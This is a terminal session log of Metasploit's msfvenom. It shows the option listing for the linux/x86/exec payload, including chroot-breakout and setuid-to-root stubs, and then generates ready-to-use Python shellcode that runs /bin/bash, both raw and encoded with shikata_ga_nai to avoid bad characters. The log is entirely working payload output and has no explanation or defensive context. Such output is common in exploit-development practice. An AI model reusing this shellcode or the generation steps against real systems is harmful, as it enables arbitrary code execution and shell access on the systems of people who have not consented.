voltron@voltron:/tmp$ msfvenom  -p linux/x86/exec  --list-options
Options for payload/linux/x86/exec:
=========================


       Name: Linux Execute Command
     Module: payload/linux/x86/exec
   Platform: Linux
       Arch: x86
Needs Admin: No
 Total size: 36
       Rank: Normal

Provided by:
    vlad902 <vlad902@gmail.com>

Basic options:
Name  Current Setting  Required  Description
----  ---------------  --------  -----------
CMD                    yes       The command string to execute

Description:
  Execute an arbitrary command



Advanced options for payload/linux/x86/exec:
=========================

    Name                        Current Setting  Required  Description
    ----                        ---------------  --------  -----------
    AppendExit                  false            no        Append a stub that executes the exit(0) system call
    MeterpreterDebugLevel       0                yes       Set debug level for meterpreter 0-3 (Default output is strerr)
    PrependChrootBreak          false            no        Prepend a stub that will break out of a chroot (includes setreuid to root)
    PrependFork                 false            no        Prepend a stub that executes: if (fork()) { exit(0); }
    PrependSetgid               false            no        Prepend a stub that executes the setgid(0) system call
    PrependSetregid             false            no        Prepend a stub that executes the setregid(0, 0) system call
    PrependSetresgid            false            no        Prepend a stub that executes the setresgid(0, 0, 0) system call
    PrependSetresuid            false            no        Prepend a stub that executes the setresuid(0, 0, 0) system call
    PrependSetreuid             false            no        Prepend a stub that executes the setreuid(0, 0) system call
    PrependSetuid               false            no        Prepend a stub that executes the setuid(0) system call
    RemoteMeterpreterDebugFile                   no        Redirect Debug Info to a Log File
    VERBOSE                     false            no        Enable detailed status messages
    WORKSPACE                                    no        Specify the workspace for this module

Evasion options for payload/linux/x86/exec:
=========================

    Name  Current Setting  Required  Description
    ----  ---------------  --------  -----------
voltron@voltron:/tmp$ msfvenom  --format python -p linux/x86/exec  -a x86 --platform linux CMD=/bin/bash
No encoder or badchars specified, outputting raw payload
Payload size: 45 bytes
Final size of python file: 235 bytes
buf =  b""
buf += b"\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f"
buf += b"\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x0a"
buf += b"\x00\x00\x00\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x00"
buf += b"\x57\x53\x89\xe1\xcd\x80"
voltron@voltron:/tmp$ msfvenom  --format python -p linux/x86/exec  -a x86 --platform linux CMD="/bin/bash" -b "\x00\x0a\x0d"
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 72 (iteration=0)
x86/shikata_ga_nai chosen with final size 72
Payload size: 72 bytes
Final size of python file: 365 bytes
buf =  b""
buf += b"\xda\xde\xb8\xea\xf1\x10\x80\xd9\x74\x24\xf4\x5f\x31"
buf += b"\xc9\xb1\x0c\x31\x47\x18\x83\xef\xfc\x03\x47\xfe\x13"
buf += b"\xe5\xea\xf5\x8b\x9f\xb9\x6f\x44\x8d\x5e\xe6\x73\xa5"
buf += b"\x8f\x8b\x13\x36\xb8\x44\x86\x5f\x56\x13\xa5\xf2\x4e"
buf += b"\x29\x2a\xf3\x8e\x02\x48\x9a\xe0\x73\xee\x3d\x8e\xe3"
buf += b"\xee\xea\x23\x7a\x0f\xd9\x44"
voltron@voltron:/tmp$ 

